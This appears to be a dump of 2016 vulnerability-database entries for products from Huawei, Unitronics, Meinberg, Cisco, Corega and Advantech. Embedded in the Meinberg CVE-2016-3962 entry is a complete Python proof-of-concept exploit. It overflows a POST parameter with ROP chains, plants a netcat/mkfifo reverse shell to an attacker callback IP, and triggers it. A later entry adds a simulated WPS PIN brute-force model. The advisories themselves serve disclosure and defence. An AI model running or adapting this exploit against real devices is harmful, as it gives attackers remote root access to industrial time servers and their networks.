CVSS V3: 7.8
Severity: HIGH
Huawei HiSuite before 4.0.4.204_ove (Out of China) and before 4.0.4.301 (China) use a weak ACL (FILE_WRITE_DATA for BUILTIN\Users) for the HiSuite service directory, which allows local users to gain SYSTEM privileges via a Trojan horse (1) SspiCli.dll or (2) USERENV.dll file or possibly other unspecified DLL files. Huawei UTPS is prone to a local code-execution vulnerability. A local attacker can leverage this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial of service condition. Huawei HiSuite 4.0.3.301 and prior are vulnerable. Huawei HiSuite versions prior to 4.0.4.204_ove (Out of China) and versions prior to 4.0.4.301 (China) have a privilege escalation vulnerability. The vulnerability stems from the program using a weak ACL (FILE_WRITE_DATA for BUILTIN\Users) for the HiSuite service directory.
VAR-201606-0253 CVE-2016-4519 Unitronics VisiLogic OPLC IDE Stack Buffer Overflow Vulnerability
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Stack-based buffer overflow in Unitronics VisiLogic OPLC IDE before 9.8.30 allows remote attackers to execute arbitrary code via a crafted filename field in a ZIP archive in a vlp file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within parsing of a vlp file, which uses the zip file format. The software fails to validate the length of the filename field within the file before copying it to a stack buffer. This vulnerability can be leveraged by an attacker to achieve code execution within the context of the process. Unitronics VisiLogic OPLC IDE is a set of human machine interface (HMI) and PLC application programming environments for Vision and SAMBA series controllers from Unitronics, Israel. Unitronics VisiLogic is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed exploit attempts will likely cause a denial-of-service condition. Versions prior to VisiLogic 9.8.30 are vulnerable.
VAR-201706-0069 CVE-2016-6594 Multiple Blue Coat products security bypass vulnerability (blocked requests not enforced) CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Blue Coat Advanced Secure Gateway 6.6, CacheFlow 3.4, and ProxySG 6.5 and 6.6 allow remote attackers to bypass blocked requests, user authentication, and payload scanning. Blue Coat Advanced Secure Gateway, CacheFlow and ProxySG are products of Blue Coat Systems, USA: Advanced Secure Gateway is a secure web gateway appliance, CacheFlow is a caching network accelerator, and ProxySG is a proxy-based secure web gateway appliance. Multiple Blue Coat products are prone to a security-bypass vulnerability; successfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. The following products are vulnerable: Blue Coat ProxySG 6.5 and 6.6, Blue Coat ASG 6.6, and Blue Coat CacheFlow 3.4.
VAR-201607-0011 CVE-2016-3988 Multiple Meinberg NTP time server devices: stack-based buffer overflows in the firmware web interface CVSS V2: 7.5
CVSS V3: 7.3
Severity: HIGH
Multiple stack-based buffer overflows in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allow remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities; remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges, and other attacks are also possible. The following products are affected, version 6.0 and prior: Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES. These are all NTP time servers from the German company Meinberg.
VAR-201607-0012 CVE-2016-3989 Multiple Meinberg NTP time server devices: firmware web interface allows writing to unspecified scripts with root privileges CVSS V2: 8.5
CVSS V3: 8.1
Severity: HIGH
The NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote authenticated users to obtain root privileges for writing to unspecified scripts, and consequently obtain sensitive information or modify data, by leveraging access to the nobody account. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities; remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges, and other attacks are also possible. The following products are affected, version 6.0 and prior: Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES. These are all NTP time servers from the German company Meinberg. An elevation of privilege vulnerability exists in the NTP time-server interface of several Meinberg products.
VAR-201606-0288 CVE-2016-1439 Cisco Unified Contact Center Enterprise Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the management interface in Cisco Unified Contact Center Enterprise through 10.5(2) allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCux59650. Cisco Unified Contact Center Enterprise provides intelligent contact routing, call processing, network-to-desktop computer telephony integration (CTI), and multi-channel contact management over the IP infrastructure.
VAR-201607-0010 CVE-2016-3962 Multiple Meinberg NTP time server devices: stack-based buffer overflow in the firmware web interface CVSS V2: 7.5
CVSS V3: 7.3
Severity: HIGH
Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities; remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges, and other attacks are also possible. The following products are affected, version 6.0 and prior: Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES. These are all NTP time servers from the German company Meinberg.

Public proof-of-concept exploit for CVE-2016-3962 as published on Exploit-DB (source repository and write-up are noted in the script header). It overflows the "button" parameter of a POST to /cgi-bin/main; the firmware has no ASLR, so the return address and gadget addresses are fixed. Four requests are sent: one that returns into system() to append a reverse-shell line to a copy of the user-defined notification file, two ROP chains that copy the file back and trigger the notification, and a final system("killall main") to clean up the hung CGI processes.

#!/usr/bin/python
# Python 2 script (print statements, str/bytes concatenation).
#
# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit
# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
#
# 271 - trigger notifications
# 299 - copy user defined notifications
# Kernel Version: 2.6.15.1
# System Version: 530
# Lantime configuration utility 1.27
# ELX800/GPS M4x V5.30p

import socket
import struct
import sys
import time

if len(sys.argv) < 3:
    print "[-] <Host> <Callback IP> "
    sys.exit(1)

host = sys.argv[1]
callback_ip = sys.argv[2]
port = 80

# Fixed addresses inside the target's /cgi-bin/main binary (no ASLR/PIE on this firmware)
system_addr = 0x80490B0
exit_addr = 0x80492C0
some_str = 0x850BDB8        # writable scratch area used as the argument buffer
send_cmd = 0x807ED88
ret = 0x804CE65             # plain "ret" gadget, used as a sled
stack_pivot = 0x8049488     # mov esp, ebp ; ret


def send_post(body):
    """POST the overflowing form body to /cgi-bin/main and give the CGI a second to act."""
    req = "POST /cgi-bin/main HTTP/1.1\r\n"
    req += "Host: " + host + "\r\n"
    req += "User-Agent: Mozilla/5.0\r\n"
    req += "Accept: text/html\r\n"
    req += "Accept-Language: en-US\r\n"
    req += "Connection: keep-alive\r\n"
    req += "Content-Type: application/x-www-form-urlencoded\r\n"
    req += "Content-Length: " + str(len(body)) + "\r\n\r\n"
    req += body
    csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    csock.connect((host, int(port)))
    csock.send(req)
    csock.close()
    time.sleep(1)


def system_chain(command):
    """Overflow the 'button' parameter and return into system(command); exit() then cleans up.
    The command string itself is placed right after the argument pointer so it lands at some_str."""
    msg = "button=" + "A" * 10028
    msg += struct.pack("I", system_addr)
    msg += struct.pack("I", exit_addr)
    msg += struct.pack("I", some_str)
    msg += command + "\x00"
    return msg


def action_chain(action):
    """ROP chain that writes `action` at [eax + 0x60], calls send_cmd() and pivots the stack.
    Only `action` differs between the copy and trigger requests."""
    msg = "button=" + "A" * 9756
    msg += "B" * 28
    msg += struct.pack("I", 0x7FFEE01A)          # ebp
    msg += struct.pack("I", 0x0804ce64)          # pop eax ; ret
    msg += struct.pack("I", some_str - 0x100)    # some place
    msg += struct.pack("I", 0x080855cc)          # add dword ptr [eax + 0x60], ebp ; ret
    msg += struct.pack("I", 0x080651d4)          # inc dword ptr [ebx + 0x566808ec] ; ret
    msg += struct.pack("I", ret) * (71 // 4)     # ret sled (integer division, as in the original)
    msg += struct.pack("I", send_cmd)
    msg += struct.pack("I", exit_addr)
    msg += struct.pack("I", action)              # [eax + 0x60]
    msg += struct.pack("I", some_str)            # buffer
    msg += struct.pack("I", 0xffffffff)          # count
    msg += "E" * 120
    msg += struct.pack("I", 0xB1E8B434)          # ebx
    msg += struct.pack("I", some_str - 100)      # esi
    msg += struct.pack("I", some_str - 100)      # edi
    msg += struct.pack("I", some_str - 0x100)    # ebp
    msg += struct.pack("I", stack_pivot)         # mov esp, ebp ; ret
    msg += "A" * 100
    return msg


print "[+] exploiting Meinberg M400"

###################################################################
#
# Copy user_defined_notification to /www/filetmp
# Append reverse shell string to /www/filetmp
#
# A listener must be waiting on the callback host, e.g.: nc -v -l -p 4444
# The {nc,<ip>,4444} form relies on shell brace expansion to produce "nc <ip> 4444".
command = ('cp /mnt/flash/config/user_defined_notification /www/filetmp; '
           'echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,'
           + callback_ip + ',4444}>/tmp/foo;" >> /www/filetmp')
send_post(system_chain(command))

###################################################################
#
# Copy /www/filetmp to user_defined_notification
#
send_post(action_chain(0x80012111))

###################################################################
#
# Trigger reverse shell
#
send_post(action_chain(0x800120f5))

print "[+] cleaning up"

###################################################################
#
# Kill all mains that are hung-up
#
send_post(system_chain('killall main'))

print "[+] enjoy"
VAR-201606-0058 CVE-2016-5729 Lenovo BIOS EFI driver vulnerability allowing arbitrary code execution with System Management Mode privileges CVSS V2: 6.8
CVSS V3: 8.2
Severity: HIGH
Lenovo BIOS EFI Driver allows local administrators to execute arbitrary code with System Management Mode (SMM) privileges via unspecified vectors. Multiple Lenovo products are prone to this local code-execution vulnerability. Lenovo BIOS EFI Driver is a set of EFI (Extensible Firmware Interface) drivers used in the BIOS of Lenovo systems.
VAR-201606-0180 CVE-2016-4822 Corega CG-WLBARGL Command Injection Vulnerability CVSS V2: 5.2
CVSS V3: 8.0
Severity: HIGH
Corega CG-WLBARGL devices allow remote authenticated users to execute arbitrary commands via unspecified vectors. CG-WLBARGL, provided by Corega Inc, is a wireless LAN router that contains a command injection vulnerability. Ohji Kashiwazaki of Global Security Experts Inc. reported this vulnerability to IPA, and JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. An arbitrary command may be executed by an authenticated attacker. CG-WLBARGL is prone to an unspecified command-injection vulnerability because it fails to adequately sanitize user-supplied input.
VAR-201606-0181 CVE-2016-4823 Corega CG-WLBARAGM Denial of Service Vulnerability CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Corega CG-WLBARAGM devices allow remote attackers to cause a denial of service (reboot) via unspecified vectors. CG-WLBARAGM, provided by Corega Inc, is a wireless LAN router that contains a denial-of-service (DoS) vulnerability. Yuji Ukai of FFRI, Inc reported this vulnerability to IPA, and JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. An unauthenticated remote attacker may cause the product to reboot.
VAR-201606-0182 CVE-2016-4824 CG-WLR300GNV Series does not limit authentication attempts CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
The Wi-Fi Protected Setup (WPS) implementation on Corega CG-WLR300GNV and CG-WLR300GNV-W devices does not restrict the number of PIN authentication attempts, which makes it easier for remote attackers to obtain network access via a brute-force attack. CG-WLR300GNV and CG-WLR300GNV-W, provided by Corega Inc, are wireless LAN routers. The WPS functionality in the CG-WLR300GNV series does not limit PIN authentication attempts, making it susceptible to brute-force attacks. Takeshi Okamoto of Kanagawa Institute of Technology and Takaaki Minegishi reported this vulnerability to IPA, and JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. An unauthenticated attacker within wireless range of the device may perform a brute-force attack to recover the PIN and, using the recovered PIN, gain access to the network. A permission acquisition vulnerability exists in Corega CG-WLR300GNV and CG-WLR300GNV-W because the program fails to limit the number of authentication requests. CG-WLR300GNV series routers are prone to an information-disclosure vulnerability; an attacker can exploit this issue to bypass certain security restrictions and aid brute-force attacks, and other attacks may also be possible.
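Added example, not Corega's firmware: a Python model of why an unlimited number of WPS PIN attempts is decisive. It goes beyond the entry's text by using the WPS 1.0 PIN structure (seven digits plus a checksum digit, and a registrar that acknowledges the first four digits before the remaining four are checked), so an attacker needs at most 10,000 + 1,000 attempts instead of 10^7. The registrar class is a simplified stand-in for the access point (no EAP framing or cryptography), and the lockout threshold of 10 failures is an assumed policy for comparison, not a value from the advisory.

```python
import random


def wps_checksum(first7):
    """Checksum digit of a WPS PIN: d8 makes 3*(d1+d3+d5+d7) + (d2+d4+d6) + d8 a multiple of 10."""
    d = [int(c) for c in first7]
    if len(d) != 7:
        raise ValueError("expected 7 digits")
    acc = 3 * sum(d[0::2]) + sum(d[1::2])
    return (10 - acc % 10) % 10


def random_pin(rng=random):
    """A valid 8-digit WPS PIN; the rng is injectable so runs can be made deterministic."""
    first7 = "%07d" % rng.randrange(10 ** 7)
    return first7 + str(wps_checksum(first7))


class Registrar:
    """Simplified AP-side WPS PIN check.

    As in the real protocol, the AP's reply to message M4 already reveals whether the first
    four digits were right, and only then is the second half (three digits plus checksum)
    checked. max_failures=None models an AP that never locks WPS (the CG-WLR300GNV
    behaviour); otherwise WPS is locked after that many wrong PINs (assumed policy).
    """

    def __init__(self, pin, max_failures=None):
        self.pin = pin
        self.max_failures = max_failures
        self.attempts = 0
        self.failures = 0
        self.locked = False

    def try_pin(self, pin):
        """Return 'locked', 'bad_first', 'bad_second' or 'ok'."""
        if self.locked:
            return "locked"
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            result = "bad_first"
        elif pin[4:] != self.pin[4:]:
            result = "bad_second"
        else:
            return "ok"
        self.failures += 1
        if self.max_failures is not None and self.failures >= self.max_failures:
            self.locked = True
        return result


def brute_force(reg):
    """Recover the PIN from a registrar that leaks the half-PIN result.

    Worst case is 10**4 + 10**3 attempts against an AP with no attempt limit; returns None
    as soon as the AP reports that WPS is locked.
    """
    first = None
    for i in range(10 ** 4):
        cand = "%04d" % i
        r = reg.try_pin(cand + "0000")
        if r == "ok":
            return cand + "0000"
        if r == "locked":
            return None
        if r == "bad_second":            # first half confirmed by the AP
            first = cand
            break
    if first is None:
        return None
    for j in range(10 ** 3):             # only three free digits; the checksum is derived
        tail = "%03d" % j
        pin = first + tail + str(wps_checksum(first + tail))
        r = reg.try_pin(pin)
        if r == "ok":
            return pin
        if r == "locked":
            return None
    return None


if __name__ == "__main__":
    target = random_pin(random.Random(7))
    ap = Registrar(target)
    print("unlimited AP: recovered %s after %d attempts" % (brute_force(ap), ap.attempts))
    ap = Registrar(target, max_failures=10)
    print("AP locking after 10 failures: result %r, locked=%s" % (brute_force(ap), ap.locked))
```

The attempt counter is the point of the model: without a limit the search space is tiny enough to exhaust over the air in hours, while any lockout (or even a long delay per failure) turns the same search into something an attacker cannot finish, which is why the fix for this class of flaw is rate limiting rather than a longer PIN.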
VAR-201606-0287 CVE-2016-1438 Cisco AsyncOS on Email Security Appliance devices spam filtering bypass vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Cisco AsyncOS 9.7.0-125 on Email Security Appliance (ESA) devices allows remote attackers to bypass intended spam filtering via crafted executable content in a ZIP archive, aka Bug ID CSCuy39210. The vendor has confirmed this vulnerability and published it as Bug ID CSCuy39210. Supplementary information: the vulnerability type has been identified as CWE-254: Security Features (http://cwe.mitre.org/data/definitions/254.html). A third party can bypass spam filtering through crafted content in a ZIP archive. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
VAR-201606-0256 CVE-2016-4525 Advantech WebAccess unspecified ActiveX controls information disclosure vulnerability CVSS V2: 3.3
CVSS V3: 6.6
Severity: MEDIUM
Unspecified ActiveX controls in Advantech WebAccess before 8.1_20160519 allow remote authenticated users to obtain sensitive information or modify data via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag. Advantech WebAccess (formerly BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech; it supports dynamic graphical display and real-time data control and provides remote control and management of automation equipment. An arbitrary code execution vulnerability exists in Advantech WebAccess prior to 8.1_20160519, caused by the program marking an unsafe ActiveX control as safe-for-scripting; an attacker could exploit this vulnerability to insert and execute arbitrary code. Advantech WebAccess is also prone to a local buffer-overflow vulnerability. Local attackers can exploit these issues to perform unauthorized actions and crash the affected application, denying service to legitimate users. Due to the nature of these issues, code execution may be possible but this has not been confirmed. Versions prior to Advantech WebAccess 8.1_20160519 are vulnerable.